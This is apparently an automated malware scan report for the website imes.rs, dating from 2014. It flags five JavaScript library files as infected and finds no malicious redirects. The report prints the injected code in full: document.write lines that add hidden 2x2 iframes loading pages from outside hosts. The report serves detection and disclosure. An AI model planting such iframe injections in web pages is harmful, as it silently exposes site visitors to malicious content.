Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imes.rs
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://imes.rs/ | 200 OK Content-Length: 13569 Content-Type: text/html | clean |
http://imes.rs/highslide/highslide.js | 200 OK Content-Length: 50652 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); if (!hs) { var hs = { lang : { cssDirection: 'ltr', loadingText : 'Loading...', loadingTitle : 'Click to cancel', focu } }); hs.addEventListener(window, 'resize', function() { hs.getPageSize(); }); hs.addEventListener(document, 'mousemove', function(e) { hs.mouse = { x: e.clientX, y: e.clientY }; }); hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(document, 'ready', hs.getAnchors); hs.addEventListener(window, 'load', hs.preloadImages); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> | ||
http://imes.rs/Scripts/swfobject_modified.js | 200 OK Content-Length: 22013 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHO var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/indexEng.php | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://imes.rs/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://imes.rs/proizvodi.php | 200 OK Content-Length: 12072 Content-Type: text/html | clean |
http://imes.rs/js/prototype.js | 200 OK Content-Length: 126450 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var Prototype = { Version: '1.6.0.2', Browser: { IE: !!(window.attachEvent && !window.opera), Opera: add: function(classNameToAdd) { if (this.include(classNameToAdd)) return; this.set($A(this).concat(classNameToAdd).join(' ')); }, remove: function(classNameToRemove) { if (!this.include(classNameToRemove)) return; this.set($A(this).without(classNameToRemove).join(' ')); }, toString: function() { return $A(this).join(' '); } }; Object.extend(Element.ClassNames.prototype, Enumerable); Element.addMethods(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2972 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); var Scriptaculous = { Version: '1.8.1', require: function(libraryName) { document.write('<script type="text/javascr return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> | ||
http://imes.rs/js/lightbox.js | 200 OK Content-Length: 18707 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045></iframe>'); LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closela windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=1779045> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1779045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1779045> | ||
http://imes.rs/sveze_meso.php | 200 OK Content-Length: 13603 Content-Type: text/html | clean |
http://imes.rs/images/sveze_meso.jpg | 200 OK Content-Length: 13267 Content-Type: image/jpeg | clean |
http://imes.rs/fermentisane_suve_kobasice.php | 200 OK Content-Length: 15112 Content-Type: text/html | clean |
http://imes.rs/images/fermentisane_suve_kobsasice.jpg | 200 OK Content-Length: 16898 Content-Type: image/jpeg | clean |
http://imes.rs/suhomesnati_proizvodi.php | 200 OK Content-Length: 13620 Content-Type: text/html | clean |
http://imes.rs/images/suhomesnati_proizvodi.jpg | 200 OK Content-Length: 19793 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imes.rs
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Sep 2014 10:40:18 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1546.
X-Powered-By: PHP/5.2.10
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: imes.rs
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Sep 2014 10:40:18 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1546.
X-Powered-By: PHP/5.2.10
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: imes.rs
Referer: http://www.google.com/search?q=imes.rs
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: imes.rs
Referer: http://www.google.com/search?q=imes.rs
Result:
The result is similar to the first query. There are no suspicious redirects found.